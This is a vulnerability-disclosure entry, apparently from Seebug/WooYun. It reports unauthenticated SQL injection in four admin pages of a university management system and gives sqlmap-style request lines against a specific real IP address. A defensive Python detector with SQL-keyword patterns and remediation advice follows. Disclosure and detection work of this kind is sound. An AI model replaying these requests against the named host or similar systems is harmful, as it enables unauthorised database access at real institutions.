SQL injection in a system used by universities (DBA) (no login required) 2-5

2015-04-08T00:00:00
ID SSV:95485
Type seebug
Reporter Root
Modified 2015-04-08T00:00:00

Description

Brief description:

··

Detailed description:

WooYun: "SQL injection in a system used by universities (bundle) (DBA) (no login required) 2" (previous submission)

Injectable file and parameter: language.asp, editLangCode

Case: 202.195.243.37/tasi/admin/system/language.asp --data "editLangCode=SS&editLangName=SS&langid=&action=add&btnSaveLang=%B1%A3%B4%E6" -p editLangCode

The first two cases were fed into sqlmap:

<img src="https://images.seebug.org/upload/201504/041851343cf6a5757f52e1e83706dac91dc10678.png" alt="Screenshot (1112).png" width="600">

<img src="https://images.seebug.org/upload/201504/04185144b366fa2dae4234a1e108e5508d67d51d.png" alt="Screenshot (1113).png" width="600">

<img src="https://images.seebug.org/upload/201504/04185231b8f5edcb4d537406c8313762bd520c99.png" alt="Screenshot (1114).png" width="600">

<img src="https://images.seebug.org/upload/201504/04185239dec97486c043b0e338b557d5efee32f2.png" alt="Screenshot (1115).png" width="600">

Injectable file and parameter: tutordept.asp, txtDeptName

Case: 202.195.243.37/tasi/admin/system/tutordept.asp --data "txtDeptName=aaa&did=0&action=add&page=0&btnNewSaveDept=%B1%A3%B4%E6" -p txtDeptName

The first two cases were fed into sqlmap:

<img src="https://images.seebug.org/upload/201504/0419010739e59103d36633cfb31c9f6c5737982a.png" alt="Screenshot (1116).png" width="600">

<img src="https://images.seebug.org/upload/201504/04190117d4641a3c44b7055a5420da3f4cde304c.png" alt="Screenshot (1117).png" width="600">

<img src="https://images.seebug.org/upload/201504/04190126b7ba66013207a6b8a9def0a9e997bfd4.png" alt="Screenshot (1118).png" width="600">

WooYun: "SQL injection in a system used by universities (bundle) (DBA) (no login required) 2" (previous submission)

Injectable file and parameter: subject.asp, editSClassName

Case: 202.195.243.37/tasi/admin/system/subject.asp --data "editSClassCode=01&editSClassName=%D5%DC%D1%A7&dtype=1&scid=1&type=modify&btnSaveSClass=%B1%A3%B4%E6" -p editSClassName

The first two cases were fed into sqlmap:

<img src="https://images.seebug.org/upload/201504/04192235413653ae4f69cc595ba862b940f37249.png" alt="Screenshot (1119).png" width="600">

<img src="https://images.seebug.org/upload/201504/04192244d3456e6eca685704a783a1336f4c8e66.png" alt="Screenshot (1120).png" width="600">

<img src="https://images.seebug.org/upload/201504/041922522d2be922a362bc9e39bcc0bf71e49155.png" alt="Screenshot (1121).png" width="600">

<img src="https://images.seebug.org/upload/201504/0419230312a643d3f6632594824f02c61c5e890e.png" alt="Screenshot (1122).png" width="600">

WooYun: "SQL injection in a system used by universities (bundle) (DBA) (no login required) 2" (previous submission)

Injectable file and parameter: usermng.asp, txtLogin

Case: 202.195.243.37/tasi/admin/system/usermng.asp --data "txtLogin=dd&txtPassword=dd&txtName=dd&cboUserType=0&txtDesc=dd&userid=0&oldlogin=&action=add&btnEditSaveUser=%B1%A3%B4%E6" -p txtLogin

sqlmap results for the first two cases:

<img src="https://images.seebug.org/upload/201504/04193148feadca08d83596fd8f27294f56933afa.png" alt="Screenshot (1123).png" width="600">

<img src="https://images.seebug.org/upload/201504/041931570a26b5cc71377629b4ccfe084d343fd7.png" alt="Screenshot (1124).png" width="600">

<img src="https://images.seebug.org/upload/201504/041932073d03004b0135a00b60bc335a8304ed1e.png" alt="Screenshot (1125).png" width="600">

<img src="https://images.seebug.org/upload/201504/0419321742a68715c04d6d14b4ead2ff9dfcf2b3.png" alt="Screenshot (1126).png" width="600">
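A defender-side check for the four file and parameter pairs reported above, as an added example that is not part of the original report or of the affected product's code. It flags POSTs to those admin pages that arrive without a login or carry SQL metacharacters in the reported parameter. The `logged_in` flag (supplied by the caller from session state), the `check_request` name and the character heuristic are assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Page under /admin/system/ -> parameter the report names as injectable.
REPORTED = {
    "language.asp": "editLangCode",
    "tutordept.asp": "txtDeptName",
    "subject.asp": "editSClassName",
    "usermng.asp": "txtLogin",
}

# Assumed heuristic: quotes, statement separators, comment markers and SQL
# keywords do not belong in a language code, department, subject or login name.
SUSPICIOUS = re.compile(
    r"""['";]|--|/\*|\b(?:select|union|waitfor|exec|declare)\b""", re.I)


def check_request(url, body, logged_in):
    """Return findings for one POST request to the reported admin pages."""
    path = urlsplit(url).path.lower()  # deployments differ in case: /tasi/, /TASi/
    if "/admin/system/" not in path:
        return []
    param = REPORTED.get(path.rsplit("/", 1)[-1])
    if param is None:
        return []
    findings = []
    if not logged_in:
        findings.append("unauthenticated POST to admin page")
    # The forms post GBK-encoded values (btnSaveLang=%B1%A3%B4%E6), so decode as GBK.
    fields = parse_qs(body, keep_blank_values=True, encoding="gbk", errors="replace")
    for value in fields.get(param, []):
        if SUSPICIOUS.search(value):
            findings.append(f"SQL metacharacters in {param}")
    return findings


if __name__ == "__main__":
    # Constructed samples: bodies follow the report's requests; the second value is altered.
    samples = [
        ("/tasi/admin/system/language.asp",
         "editLangCode=SS&editLangName=SS&langid=&action=add", False),
        ("/TASi/admin/system/usermng.asp",
         "txtLogin=dd%27--&txtPassword=dd&action=add", True),
    ]
    for url, body, logged_in in samples:
        print(url, check_request(url, body, logged_in))
```

A filter like this only narrows exposure; the fix for the reported issue is to require a session on every page under `/admin/system/`, bind these parameters through parameterized queries, and run the application's database account without DBA rights.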

Proof of vulnerability:

···